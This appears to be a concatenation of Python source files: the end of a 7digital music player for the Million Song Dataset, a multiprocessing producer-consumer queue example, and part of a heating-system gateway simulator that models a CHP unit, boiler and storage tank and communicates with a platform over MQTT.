self.dev.play(buf, len(buf))
buf = mf.read()
self.do_stop = False
self.is_playing = False
tlag = time.time() - t1
self.printinfo('done playing url after',str(int(tlag)),'seconds')
def printinfo(self,*msg):
""" print message if verbose """
if self.verbose>0:
s = 'INFO:'
for k in msg:
s += ' ' + str(k)
print s
def launch_applet(tmdb=None,url=''):
"""
Should be the main function to launch the interface
"""
app = PlayerApp(tmdb=tmdb,url=url)
app.master.title("7digital Player for the Million Song Dataset")
app.mainloop()
def die_with_usage():
""" HELP MENU """
print 'player_7digital.py'
print ' by T. Bertin-Mahieux (2011) Columbia University'
print ' tb2332@columbia.edu'
print 'Small interface to the 7digital service.'
print 'INPUT'
print ' python player_7digital.py track_metadata.db'
print 'REQUIREMENTS'
print ' * 7digital key in your environment as: DIGITAL7_API_KEY'
print ' * pyao'
print ' * pymad'
print ' * Tkinter for python'
print ' * track_metadata.db (new one with 7digital ids, check website)'
sys.exit(0)
if __name__ == '__main__':
# help menu
if len(sys.argv) < 2:
die_with_usage()
# check track metadata, makes sure it's the new version
# with track_7digitalid
tmdb = sys.argv[1]
if not os.path.isfile(tmdb):
print 'ERROR: file',tmdb,'does not exist.'
sys.exit(0)
conn = sqlite3.connect(tmdb)
try:
res = conn.execute("SELECT track_7digitalid FROM songs LIMIT 1")
data = res.fetchone()
except sqlite3.OperationalError:
print 'ERROR: do you have the old track_metadata.db?'
print ' get the new one with 7digital ids on the Million Song Dataset website'
sys.exit(0)
finally:
conn.close()
# launch interface
url = ''
launch_applet(tmdb=tmdb,url=url)
|
queue1_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Two consumer processes and one producer
import multiprocessing
import time
def consumer(input_q):
while True:
item = input_q.get()
print(item) # replace with the actual processing work
input_q.task_done()
time.sleep(1)
def producer(seq,output_q):
for item in seq:
output_q.put(item)
if __name__ == '__main__':
q = multiprocessing.JoinableQueue() # shared queue
cons_p1 = multiprocessing.Process(name = "P1", target=consumer, args=(q,))
cons_p1.daemon = True # exits when the main process exits; otherwise it would run forever
cons_p1.start()
cons_p2 = multiprocessing.Process(name = "P2", target=consumer, args=(q,))
cons_p2.daemon = True
cons_p2.start()
seq = range(100)
producer(seq, q)
q.join() # wait until all queued items have been consumed; the notification comes from q.task_done()
print("Main Terminated.")
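# Note on the pattern above (added commentary, not original code): q.join() blocks the
# main/producer process until every item put() on the JoinableQueue has been matched by a
# task_done() call in one of the consumers. Because the consumers are daemon processes,
# they are terminated automatically once "Main Terminated." is printed and the main
# process exits.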
|
gateway.py
|
from time import sleep
import numpy as np
import math
import random
from datetime import datetime, timedelta, timezone
import paho.mqtt.client as mqtt
import threading
import ssl
#import json # only for debug of control_execute_schedule
#import requests
#import pycurl
#import httplib
#import urllib
import utils
import chpunit
import gasheater
import controlvalve
import heatingcurve
import storagetank
import timestep
import predict_thermal
import requests
import json
import platformcontroller
########################################################################
class GatewaySystem():
""" simulator of the gateway box """
# ==================================================================
# constructor method with instance variables
def __init__(self, t_initial):
# initialize everyone
# outputs
self.p_atm = 0.1 * 1.01325 # atmospheric pressure in MPa (1.01325 bar * 0.1 MPa/bar)
self.t1 = self.t2 = self.t3 = self.t4 = self.t5 = self.t6 = self.t7 = self.t8 = self.t9 = self.t10 = t_initial
self.t11 = self.t12 = self.t13 = self.t14 = self.t15 = self.t16 = self.t17 = self.t18 = self.t19 = self.t20 = t_initial
self.t21 = self.t22 = self.t23 = self.t24 = self.t25 = self.t26 = self.t27 = self.t28 = self.t29 = self.t30 = t_initial
self.V_1 = self.V_2 = self.V_3 = self.V_4 = 0.0 # in m3/s
self.Z_1 = self.Z_2 = 0.0 # double - gas consumption in ...
self.Wh1 = self.Wh2 = self.Wh3 = 0.0 # double - electricity consumption/production in kWh
# miscellaneous
self.too_cold = 0 # flag 0, 1
self.t_initial = t_initial # double - temperature in °C
# sending of monitoring data
self.next_sending_timestamp = 0 # time at which the data is to be sent to the platform
# prediction
self.next_prediction_timestamp = 0 # time at which the prediction of the energy vector is to be made
self.prediction_time_step_in_s = 0 # time interval at which the energy vector is to be produced
self.output_horizon_in_h = 0 # time horizon for which the forecast is to be made
self.output_resolution_in_s = 0 # resolution of the forecast in s
# schedule
self.current_schedule = 0 # schedule := list of dicts
self.schedule_changed = True # flag for schedule change
self.tau_end = 0 # datetime - end of the current time slot
self.tau_off = 0 # datetime - time by which self.e_produced_in_kWh is expected to reach the scheduled amount
self.e_produced_in_kWh = 0 # double - aggregated production already realised in this time slot
self.e_to_prod_in_kWh = 0 # double - envisioned production in this time slot
self.production = [] # list of dicts - contains production data for the last timestep
self.sched_idx = -1 # index in list of dicts
# appliances
self.storage_tank = 0 # object
self.chp = 0 # object
self.boiler = 0 # object
self.heizkurve = 0 # object
self.rod_stat = 0 # double - value from 0 to 1. 0 is no power = no heat input into tank; 1 is full power input into tank
self.tsm = 0 # object
self.keep_chp_on = False # control flag to keep operating CHP as long as possible
self.keep_chp_off = False # control flag to refrain from operating CHP as long as possible
# control algorithm
self.temp_dhw = 55.0 # minimal allowed temperature of the domestic hot water + temperature difference due to the cooling in the pipes
self.temp_a_hp = 15.0 # boundary ambient air temperature for the heating period
self.temp_hot = 70.0 # boundary heating water temperature - hot water
self.temp_warm = 50.0 # boundary heating water temperature - warm water
self.ctrl_option = 1 # defines how hard the schedule should be realised
# 1 - be conservative and do not allow the tank to unload completely ==> no risk of not reaching room or dhw temperature
# 2 - allow the storage tank to become fully unloaded ==> risk of not reaching the room or dhw temperature
self.unload = False
self.tank_state = 0
self.dhw_prod = 0
# provisioning and multi gateway platform mode
self.time_data = {'valid': False}
self.receiver_on = False
self.demo_on = False
# actual electricity consumption = the other electricity consumption = Wh3 - (Wh2 + Wh1)
self.electricity_consumption_kWh = 0.0
# mqtt configuration for sending data to the platform
self.mqtt_client = 0
self.mqtt_client_initialized = False
self.mqtt_broker = 0
self.mqtt_port_nr = 0
self.mqtt_api_key = 0
self.mqtt_sensor_name = 0
self.mqtt_commands = 0
self.mqtt_attributes = 0
self.mqtt_client_name = 0
# mqtt configuration for subscription to data from demonstrator
self.got_demo_data = False
self.tni = 0.0
self.coef = 0.0
#self.mqtt_client_name_cmd = 0
self.q_in_kW = 0
# Sperrzeiten
self.sp_active = False
self.sp_start = []
self.sp_end = []
# debug flag
# 0 - no output, only warnings and errors; 1 - communication with platform; 2 - write files; 3 - calculation vs. sending frequency that's needed for demo
self.dbg = 0 # integer
self.dbg_path = "."
# #print('t1 = {}'.format(self.t1))
#end __init__
# ==================================================================
def get_storage_tank(self):
return self.storage_tank
# ==================================================================
def get_energy_left_to_tmax(self, tmax):
return self.storage_tank.calc_energy_left_to_tmax(tmax)
# ==================================================================
def get_max_temp_of_chp(self):
return self.chp.get_max_temp_of_chp()
# ==================================================================
def get_out_temp_of_gb(self):
return self.boiler.get_out_temp()
# ==================================================================
def get_mstr_hk(self):
return self.heizkurve.get_design_mass_flow()
# ==================================================================
def get_mstr_chp(self):
return self.chp.get_mass_flow()
# ==================================================================
def get_mstr_gb(self):
return self.boiler.calc_mass_flow()
# ==================================================================
def get_el_prod_kWh(self, therm_prod_kWh):
return self.chp.get_el_prod_kWh(therm_prod_kWh)
# ==================================================================
def max_pred_temp_supply_heating_sys(self, t_a_min):
return self.heizkurve.get_supply_temperature(t_a_min)
# ==================================================================
def get_return_temperature(self, t_a_pred):
return self.heizkurve.get_return_temperature(t_a_pred)
# ==================================================================
def thermal_energy_that_can_be_got_from_storage(self, tmin):
return self.storage_tank.calc_energy_above_tmin(tmin)
# ==================================================================
# obsolete function - to delete after check
def get_temp_profile_in_storage(self):
return self.storage_tank.output_temperatures()
# ==================================================================
def get_slice_vol(self):
return self.storage_tank.get_slice_vol()
# ==================================================================
def get_max_thermal_rod_power(self):
return self.storage_tank.get_max_thermal_rod_power() # in kW
# ==================================================================
def get_max_th_tank_power(self):
return self.storage_tank.get_max_th_tank_power(self.t22) # in kW
# ==================================================================
def get_max_thermal_boiler_power(self):
return self.boiler.get_max_thermal_boiler_power() # in kW
# ==================================================================
def initialize_actual_time(self, real_time_send, start_sim_inh, end_sim_inh):
# def initialize_actual_time(self, simulation, end_sim_inh):
if real_time_send:
return datetime.now() # time in datetime format
else:
return (datetime.now() - timedelta(hours=(end_sim_inh - start_sim_inh))) # time in datetime format
#return (datetime.now() - timedelta(hours=end_sim_inh)) # time in datetime format
#end initialize_actual_time
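# Worked example (added commentary, values assumed): with real_time_send == False,
# start_sim_inh = 0 and end_sim_inh = 48, the method returns "now minus 48 hours",
# so a 48-hour simulated window ends roughly at the current wall-clock time. With
# real_time_send == True the current wall-clock time is used directly.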
# ==================================================================
def loop_condition(self, simulation, actual_time, end_datetime):
if simulation:
if actual_time > end_datetime:
return False
else:
return True
else:
return True
#end loop_condition
# ==================================================================
def update_time(self, simulation, platform, actual_time, tsm, real_time_send, sleep_time_in_s, time_step_in_s):
next_time_step = actual_time + timedelta(seconds=tsm.get_timestep())
#print('now = {}, next = {}'.format(datetime.now(), next_time_step))
if simulation:
if(platform):
if(real_time_send):
while datetime.now() < next_time_step:
sleep(0.1)
return datetime.now()
#sleep(time_step_in_s)
#return (next_time_step)
else:
sleep(sleep_time_in_s)
return (next_time_step)
else:
return (next_time_step)
else:
while datetime.now() < next_time_step:
sleep(1)
return datetime.now()
#end update_time
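# Summary of the branches above (added commentary): in simulation + platform mode with
# real_time_send the loop waits for the wall clock to reach the next step; in simulation +
# platform mode without real_time_send it sleeps sleep_time_in_s and jumps to the next
# step; in pure simulation mode it jumps immediately; outside simulation it polls the
# wall clock once per second until the next step is due.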
# ==================================================================
def get_heater_rod_status(self, simulation, el_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh):
""" returns the status between 0 = OFF and 1 = ON of the electrical rod heater """
if simulation:
# file based simulation - values are read from the file
# hour_of_year = 1
simtime = int(math.floor(((actual_time - start_datetime).seconds / (60.0 * 15.0)) + start_sim_inh * 60.0 / 15.0)) # simulation time in quarter-hours (15-minute slots)
if (simtime >= 35040): # actual time exceeds the first year (there are 35 040 slots of 15 minutes in a year)
simtime = simtime - math.floor(simtime / 35040) * 35040
line1 = utils.get_significant_parts(el_load_file[simtime].rstrip().split(" "))
y1 = float(utils.get_ith_column(2, line1))
return y1 # as load from 0 to 1
else:
# real-time operation - values would be received via MQTT; not implemented for now
return 0
#end get_heater_rod_status
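# Worked example of the slot arithmetic above (added commentary, values assumed):
# with start_sim_inh = 24 and 90 minutes elapsed since start_datetime,
# simtime = floor(5400 s / 900 s + 24 h * 4 slots/h) = 6 + 96 = 102, i.e. the 103rd
# quarter-hour entry of el_load_file. Note that timedelta.seconds wraps at 24 h; for
# multi-day runs timedelta.total_seconds() would avoid that wrap.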
# ==================================================================
def get_dhw_minute_consumption(self, simulation, dhw_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh):
# returns the volume of dhw consumption read from file dhw_load_file in m3/s
# file dhw_load_file contains values in in dm3/min = liter/minute
# simulation - flag for real time or file based
# dhw_load_file - file with dhw consumption in litres resolved for 525600 minutes of the year = 8760 h/a * 60 min/h
# actual_time - the current time or current simulation time in the datetime format
# start_datetime - start of the calculations in datetime format
# start_sim_inh - only in simulation mode - the starting point of the simulation in hours - will be found in the wetter_file
# end_sim_inh - only in simulation mode - the end point of the simulation in hours - arbitrarily stated
nn = len(dhw_load_file) # = 525600 for the whole year
# file based simulation - values are read from the file
# hour_of_year = 1
simtime = int(math.floor(((actual_time - start_datetime).seconds / 60.0) + start_sim_inh * 60.0)) # simulation time in minutes
if (simtime >= nn): # actual time exceeds the first year (there are 525 600 minutes in a year)
simtime = simtime - math.floor(simtime / nn) * nn
nn = len(dhw_load_file)
if(int(simtime) > nn):
simtime = int(simtime) % nn
minute = int(dhw_load_file[simtime])
return minute/60000.0 # in cubic metres per second: m3/s = dm3/min / (60 s/min * 1000 dm3/m3)
#
#wyn = 0.0
#if((actual_time-start_datetime).seconds >= (3600.0 * 48.0)):
#wyn = minute / 60000.0 # in cubic meter per second = m3/s = dm3/min / (60 s/min * 1000 dm3/m3)
#return wyn
#end get_dhw_minute_consumption
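# Worked unit conversion (added commentary, value assumed): a file entry of 6 litres/minute
# gives 6 / 60000 = 0.0001 m3/s, because 1 dm3/min = 1/(60 s/min * 1000 dm3/m3) m3/s.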
# ==================================================================
def schedule_receiver(self, config_file_path):
#print('STARTED RECEIVER')
config_file = utils.check_and_open_json_file(config_file_path)
# mqtt
conf_plat = config_file['calculation']['platform_mode']
#mqtt_broker = conf_plat['mqtt_broker']
#mqtt_port_nr = conf_plat['mqtt_port_nr']
mqtt_api_key = conf_plat['mqtt_api_key']
mqtt_sensor_name = conf_plat['mqtt_sensor_name']
mqtt_attributes = conf_plat['mqtt_attributes']
mqtt_commands = conf_plat['mqtt_commands']
dbg_level = conf_plat['dbg_level']
#mqtt_client_name = 'rvk3'
#mqtt_client_name = conf_plat['mqtt_client_name_cmd']
#client = self.create_mqtt_client(mqtt_broker, mqtt_port_nr, mqtt_client_name) # creates mqtt client
#self.subscribe_to_schedule(self.mqtt_client, mqtt_api_key, mqtt_sensor_name, mqtt_commands) # subscribes to schedule topic
# wait for the simulator to initialize and setup the mqtt client
loop1 = True
if(dbg_level == 1):
print('[', end = '')
while loop1:
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.mqtt_client_initialized):
loop1 = False
sleep(1)
if(dbg_level == 1):
print('.', end = '')
# take over the settings of the platform and implement them
if(dbg_level == 1):
print(']')
self.subscribe_to_schedule(self.mqtt_client, mqtt_api_key, mqtt_sensor_name, mqtt_commands) # subscribes to schedule topic
try:
if(dbg_level == 1):
print('RECEIVER starts looping == listening')
self.mqtt_client.loop_start() # listens for the schedule
self.receiver_on = True
if(dbg_level == 1):
print('self.receiver_on = {}'.format(self.receiver_on))
#self.mqtt_client.loop_forever() # listens for the schedule
except KeyboardInterrupt: # does not work for some unknown reason
utils.my_thread_kill()
except:
utils.my_thread_kill()
# end schedule_receiver
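# Startup handshake (added commentary): schedule_receiver runs in its own thread and spins
# on self.mqtt_client_initialized, which the simulator thread sets to True after creating
# self.mqtt_client; only then does the receiver subscribe to the command topic, call
# loop_start(), and signal readiness back via self.receiver_on.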
# ==================================================================
def demo_receiver(self, config_file_path):
print('STARTED DEMO RECEIVER')
config_file = utils.check_and_open_json_file(config_file_path)
# mqtt
conf_plat = config_file['calculation']['platform_mode']
mqtt_broker = conf_plat['mqtt_broker']
mqtt_port_nr = conf_plat['mqtt_port_nr']
dbg_level = conf_plat['dbg_level']
mqtt_client_name = config_file['calculation']['demonstrator_mode']['mqtt_client_name_receiver'] # rvk4
mqtt_topic = config_file['calculation']['demonstrator_mode']['mqtt_topic']
authentication = config_file['calculation']['demonstrator_mode']['authentication']['activate']
mqtt_username = config_file['calculation']['demonstrator_mode']['authentication']['mqtt_username']
mqtt_password = config_file['calculation']['demonstrator_mode']['authentication']['mqtt_password']
tls_connection = config_file['calculation']['demonstrator_mode']['authentication']['tls_connection']
loop1 = True
while loop1:
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.mqtt_client_initialized):
loop1 = False
sleep(1)
client = self.create_mqtt_client2(mqtt_broker, mqtt_port_nr, mqtt_client_name, authentication, mqtt_username, mqtt_password, tls_connection) # creates mqtt client
client.subscribe(mqtt_topic) # subscribe
try:
#client.loop_forever() # listens for the schedule
if(dbg_level == 1):
print('DEMO RECEIVER at rvk starts looping == listening')
client.loop_start() # listens for the schedule
self.demo_on = True
# time.sleep(1)
except KeyboardInterrupt:
utils.my_thread_kill()
except:
utils.my_thread_kill()
# end demo_receiver
# ==================================================================
def is_platform_mode_on(self, config_file_path):
config_file = utils.check_and_open_json_file(config_file_path)
if(config_file['calculation']['mode'] == 'simulation'):
return False
elif(config_file['calculation']['mode'] == 'platform'):
return True
else:
print('EXCEPTION: wrong mode = {}'.format(config_file['calculation']['mode']))
return False
# end is_platform_mode_on
# ==================================================================
def is_demo_mode_on(self, config_file_path):
config_file = utils.check_and_open_json_file(config_file_path)
return config_file['calculation']['demonstrator_mode']['activated']
# ==================================================================
def main(self, config_file_path):
#config_file_path = './config.json'
print('main config_file_path = {}'.format(config_file_path))
thread1 = threading.Thread(target=self.simulator, args=(config_file_path,))
if(self.is_platform_mode_on(config_file_path)):
thread2 = threading.Thread(target=self.schedule_receiver, args=(config_file_path,))
if(self.is_demo_mode_on(config_file_path)):
thread3 = threading.Thread(target=self.demo_receiver, args=(config_file_path,))
# Will execute both in parallel
thread1.start()
if(self.is_platform_mode_on(config_file_path)):
thread2.start()
if(self.is_demo_mode_on(config_file_path)):
thread3.start()
# Joins threads back to the parent process, which is this program
thread1.join()
if(self.is_platform_mode_on(config_file_path)):
thread2.join()
if(self.is_demo_mode_on(config_file_path)):
thread3.join()
# end main
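# Minimal usage sketch (added commentary, values assumed - not part of the original code):
#   gw = GatewaySystem(t_initial=20.0)
#   gw.main('./config.json')
# main() starts the simulator thread and, depending on the configuration, the platform
# schedule receiver and the demonstrator receiver threads, then joins them.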
# ==================================================================
def simulator(self, config_file_path):
print('STARTED SIMULATOR')
# some configuration
arch_option_1 = True # True ==> create db gets asked in every timestep
arch_option_1 = False # False ==> create db gets asked only every three hours
# read in configuration file
config_file = utils.check_and_open_json_file(config_file_path)
# initialisation of objects and variables
(platform, simulation, time_step_in_s, record_step_in_s, start_sim_inh, end_sim_inh, wetter_file,
dhw_load_file, el_load_file, actual_time, F, tsm, tank, chp, kessel, cvalve, heizkurve, pred,
real_time_send, sleep_time_in_s, demonstrator, pred_res_in_s, powr_conf, heatc_conf,
multiple_gateways, provisioning_endpoint, device_id,
authentication, mqtt_username, mqtt_password, tls_connection, mqtt_topic_attr) = self.initialize_components(config_file)
# MQTT initialization
platform_client = 0
if(platform):
self.mqtt_client = self.create_mqtt_client(self.mqtt_broker, self.mqtt_port_nr, self.mqtt_client_name,
authentication, mqtt_username, mqtt_password, tls_connection) # creates mqtt client
self.mqtt_client_initialized = True
# end if(platform):
# provisioning and time management
if(multiple_gateways):
if(self.dbg == 1):
print('waiting for mqtt receiver to initialize')
if(not self.receiver_on):
loop1 = True
while loop1:
if(self.receiver_on):
if(demonstrator):
if(self.demo_on):
loop1 = False
else:
loop1 = False
sleep(1)
if(self.dbg == 1):
print('simulator sees self.receiver_on = {}'.format(self.receiver_on))
if(self.dbg == 1):
print('provisioning of gw: ')
#provisioning_endpoint = 'http://iot-agent:4041/iot/devices'
#provisioning_endpoint = "http://127.0.0.1:4041/iot/devices"
# provision device with the platform
# if the gateway has already been provisioned, you get an informative message but nothing breaks
utils.provision_rvk(device_id, device_id, "rvk", provisioning_endpoint)
# send initial data set consisting of actual_time and number 10.0 to the platform
# only this makes the crate db create the needed tables - which in turn makes its query possible
# db queries are needed for the rest of initialization
# (self.get_next_prediction_timestamp and self.pred.update_heat_consumption_from_crate in self.process_gw_on_platform)
utils.send_ini_data_to_platform(mqtt_topic_attr, 10.0, actual_time, self.mqtt_client)
# if the 'calculation' -> 'platform_mode' -> 'real_time_send' is false
# the time of gateway has to be synchronized with the time of the platform
# If it is true, every gateway can use its own clock as the differences
# are expected to be neither significant nor crucial for the operation
if(self.dbg == 1):
print('real_time_send = {}'.format(real_time_send))
if(not real_time_send):
# wait for the platform to send its time settings
loop1 = True
ijk = 0
if(self.dbg == 1):
print('{} self.time_data = {}'.format(ijk, self.time_data))
while loop1:
ijk = ijk + 1
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.time_data['valid']):
loop1 = False
sleep(1)
if(self.dbg == 1):
print('Seconds left to undo provisioning and exit = {}; '.format(15 - ijk))
if(ijk > 15):
utils.undo_provisioning_and_exit(device_id, provisioning_endpoint)
# take over the settings of the platform and implement them
actual_time = self.time_data['actual_time']
start_sim_inh = self.time_data['start_time_in_h']
end_sim_inh = self.time_data['end_time_in_h']
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
self.tsm.set_end_time(actual_time)
self.chp.reset_next_safe_turn_on(actual_time)
self.boiler.reset_next_safe_turn_on(actual_time)
self.storage_tank.update_act_time(actual_time)
self.current_schedule = self.initialize_schedule(actual_time)
if(self.dbg == 1):
print('self.time_data = {}'.format(self.time_data))
# end if(not real_time_send):
# else: # do nothing - both rvk and platform are using their system clocks and hopefully do not need to be synchronized
# end if(multiple_gateways):
# start standard calculation
ini_time_in_h = utils.convert_time_to_hours(actual_time)
last_record_time = actual_time # time in datetime format
print_time_in_h = 0
start_datetime = actual_time
end_datetime = actual_time + timedelta(hours=(end_sim_inh - start_sim_inh))
#end_datetime = actual_time + timedelta(hours=end_sim_inh)
print('actual_time = {} (in hours = {})'.format(actual_time,utils.convert_time_to_hours(actual_time)))
print('start_datetime = {} (in hours = {})'.format(start_datetime,utils.convert_time_to_hours(start_datetime)))
print('end_datetime = {} (in hours = {})'.format(end_datetime,utils.convert_time_to_hours(end_datetime)))
#print('simulation = {} platform = {}'.format(simulation,platform))
# header of the permanent output data file - written in all debug modes and all operation modes
self.write_header_output_file(F)
print('modules initialized')
# stats of this simulation run
timestart = datetime.now()
# Martin's code - do I need this? TODO - yes, needed for instant initialization of schedule calculation - might be useful in demo mode
predict_thermal.file_name=open("./pred.txt","a")
# debug data
H = 0
if(self.dbg == 2):
H = open("{}/logrvk1.dat".format(self.dbg_path),"w")
G = 0
if(self.dbg == 2):
G = open("{}/mylog.dat".format(self.dbg_path),"w")
G.write(' all data sent from gateway.py to crate db \n')
G.write(' utc time stamp time_in_h \n')
if(self.dbg == 3):
sendstart = datetime.now()
# start main program loop
while self.loop_condition(simulation, actual_time, end_datetime):
# receive new schedule and realise it in practice
self.control_execute_schedule(actual_time)
# t_a
if(demonstrator and self.got_demo_data):
ambient_temp = self.tni - self.q_in_kW * self.coef # = t_ni - Q/Q_n * (t_ni - t_na)
self.got_demo_data = False
else:
ambient_temp = utils.get_ambient_temperature(simulation, wetter_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
self.t30 = ambient_temp
# dhw consumption
self.V_1 = self.get_dhw_minute_consumption(simulation, dhw_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
# cold water temperature
self.t22 = 10.0
# electrical rod heater:
# electricity consumption of "other" consumers
self.electricity_consumption_kWh = self.calc_el_cons_other(actual_time, powr_conf)
#el_heat_status = self.get_heater_rod_status(simulation, el_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
# status of electrical rod heater in the heat storage tank as double number from 0,0 to 1,0. (here "," is decimal sign)
el_heat_status = self.rod_stat
# time management
act_time_in_h = utils.convert_time_to_hours(actual_time)-ini_time_in_h
next_time_step = self.update_time(simulation, platform, actual_time, tsm, real_time_send, sleep_time_in_s, time_step_in_s)
real_dt_in_s = (next_time_step - actual_time).seconds
tank.update_act_time(act_time_in_h) # used only for debugging
# calculation
self.one_iteration_step(tsm, tank, chp, kessel, cvalve, heizkurve, ambient_temp, el_heat_status, actual_time, heatc_conf)
self.update_electricity_production_status(time_step_in_s, pred_res_in_s)
# output control
last_record_time = self.write_output_into_file(F, record_step_in_s, last_record_time, actual_time ,act_time_in_h ,ambient_temp ,chp ,kessel ,cvalve ,tank, tsm) # at the end of the timestep
# saving data for prediction algorithms
if(self.time_condition_for_sending_monitoring(actual_time)):
if(self.dbg == 3):
sendend = datetime.now()
#print('SENDING 2 plat in {}'.format(sendend - sendstart), end='')
print('SENDING 2 plat in {}'.format(sendend - sendstart))
sendstart = sendend
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
if(platform):
self.send_data_to_platform(actual_time, act_time_in_h, chp, kessel, cvalve, tank, self.mqtt_client, G)
if(arch_option_1):
pred.update_heat_consumption_from_crate(actual_time, time_step_in_s, arch_option_1, device_id, 1)
else:
self.save_data_for_prediction(pred, act_time_in_h, ambient_temp)
######################### PLATFORM - BEGIN - 1 #################
# if(self.time_condition_for_prediction(actual_time, pred)):
# print('\n\n\n\nP R E D I C T I O N\n\n\n\n')
# if(self.dbg >= 2):
# G.flush()
# G.close()
#
# G = open("./mylog.dat","w")
# G.write(' all data sent from gateway.py to crate db \n')
# G.write(' utc time stamp time_in_h \n')
# print(' weather prediction')
# weather_pred = self.get_weather_prediction(actual_time, simulation, wetter_file, start_datetime, start_sim_inh, end_sim_inh)
# if(platform and (not arch_option_1)):
# print('get data from crate')
# pred.update_heat_consumption_from_crate(actual_time, time_step_in_s, arch_option_1, device_id, fnr)
# energy_vector = 0
# #elif(not platform):
# last_t_profile = tank.output_temperatures()
# energy_vector = pred.predict_energy_vector(weather_pred, act_time_in_h, actual_time, start_datetime, start_sim_inh, end_sim_inh, self.output_horizon_in_h, self.output_resolution_in_s, last_t_profile)
# self.send_or_save_energy_vector(actual_time, energy_vector, start_datetime, platform, platform_client)
######################### PLATFORM - END - 1 ###################
#if(self.dbg == 3):
# print(' time = {}'.format(actual_time))
# proceed to the next timestep
actual_time = next_time_step
flag_big_time_step = tsm.has_timestep_ended(actual_time) # redundant ?
# show progress at prompt
if((act_time_in_h-print_time_in_h) > 0.05 * (end_sim_inh - start_sim_inh)):
print_time_in_h = act_time_in_h
if(self.dbg != 3):
print('.', end = '', flush=True)
#if(not real_time_send):
# sleep(sleep_time_in_s)
# output to the file - end
# end while self.loop_condition
F.close()
if(self.dbg == 2):
G.close()
if(self.dbg == 2):
H.close()
# duration of the calculation
timeend = datetime.now()
print('\ncalculation took = {} seconds'.format(timeend - timestart))
#end simulator
# ==================================================================
def time_condition_for_sending_monitoring(self, actual_time):
if(actual_time >= self.next_sending_timestamp):
return True
else:
return False
# end time_condition_for_sending_monitoring
# ==================================================================
def time_condition_for_prediction(self, actual_time, pred):
if(actual_time >= self.next_prediction_timestamp):
if(pred.get_q_write()):
#print('now = {}; next time = {}'.format(actual_time, self.next_prediction_timestamp))
return True
return False
#end time_condition_for_prediction
# ==================================================================
def send_or_save_energy_vector(self, actual_time, energy_vector, start_datetime, platform, platform_client):
# send energy vector to platformcontroller and get the current schedule out of it
if(self.dbg==2):
H = open("./myenvec1.dat","w")
H.write(' energy vector sent from platform \n')
H.write(' date time utc_time time_in_h P_el_min_in_W P_el_max_in_W \n')
for ln in energy_vector:
H.write(' {} '.format(ln['time stamp']))
H.write(' {} '.format(ln['time stamp'].replace(tzinfo=timezone.utc).timestamp()))
H.write(' {} '.format(ln['time_in_h']))
H.write(' {} '.format(ln['P_el_min_in_W']))
H.write(' {} \n'.format(ln['P_el_max_in_W']))
H.close()
#
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
current_sched = platformcontroller.cloud_schedule_gen(actual_time, energy_vector, start_datetime)
if(self.dbg==2):
H = open("./myschedule1.dat","w")
H.write(' schedule sent from platform \n')
H.write(' timestep_in_s = {} \n'.format(current_sched['timestep_in_s']))
H.write(' active_schedule = {} \n'.format(current_sched['active schedule']))
H.write(' date time utc_time activation energy_production_in_W \n')
myvals = current_sched['values']
for ln in myvals:
H.write(' {} '.format(str(ln['time_stamp'])))
H.write(' {} '.format(ln['time_stamp'].replace(tzinfo=timezone.utc).timestamp()))
H.write(' {} '.format(str(ln['activation'])))
H.write(' {} \n'.format(ln['energy_production_in_W']))
H.close()
print('send_or_save_energy_vector : schedule written into myschedule1.dat')
if(platform):
platformcontroller.send_schedule_to_rvk(current_sched, platform_client)
else:
self.current_schedule = current_sched
self.schedule_changed = True
if((self.dbg == 2) or (self.dbg == 1)):
print('\n\n\n\n ========= CHANGE SCHEDULE ======================\n\n\n\n')
#end send_or_save_energy_vector
# ==================================================================
def request_weather_prediction_from_platform(self, actual_time):
# holder for Ilya
return [{'date': actual_time, 'time_in_h': 0.0, 'temp_in_C': 0.0}] # note: list() over a dict would yield only its keys
#end request_weather_prediction_from_platform
# ==================================================================
def write_header_output_file(self, F):
F.write("# date time elapsed t_a t_1 t_2 t_3 t_4 t_5 t_6 t_7")
F.write(" t_8 t_9 t_10 t_11 t_12 t_13 t_14 t_15 t_16")
F.write(" t_17 t_18 t_19 t_20 t_21 t_22 t_23 t_24 t_25")
F.write(" t_26 t_27 t_28 t_29 t_30 V_1 v_2 V_3 V_4")
F.write(" Z_1 Z_2 Wh1 Wh2 Wh3 ")
F.write("chp boiler control_valve COLD mstr_dhw mstr_hw el_heater n_slice tstep_in_s \n")
F.write("# dd.mm.yyyy hh:mm:ss.micro_s h °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C m3/s m3/s m3/s m3/s")
F.write(" m3/s m3/s kW flag kg/s kg/s kW kW 0-1 kg/s kg/s 0-1 h s ")
F.write(" 0-1 0-1 0-1 '1-5 0-1 \n")
F.write("# date time elapsed t_a t_1 t_2 t_3 t_4 t_5 t_6 t_7")
F.write(" t_8 t_9 t_10 t_11 t_12 t_13 t_14 t_15 t_16")
F.write(" t_17 t_18 t_19 t_20 t_21 t_22 t_23 t_24 t_25")
F.write(" t_26 t_27 t_28 t_29 t_30 V_1 v_2 V_3 V_4")
F.write(" Z_1 Z_2 Wh1 Wh2 Wh3")
F.write(" chp boiler control_valve COLD mstr_dhw mstr_hw el_heater n_slice tstep_in_s ")
F.write("self.unload keep_chp_on keep_chp_off tank_state dhw_prod ")
F.write("d_1 d_2 d_3 d_4 d_5 d_6 d_7")
F.write(" d_8 d_9 d_10 d_11 d_12 d_13 d_14 d_15 d_16")
F.write(" d_17 d_18 d_19 d_20 ")
F.write("\n")
#end write_header_output_file
# ==================================================================
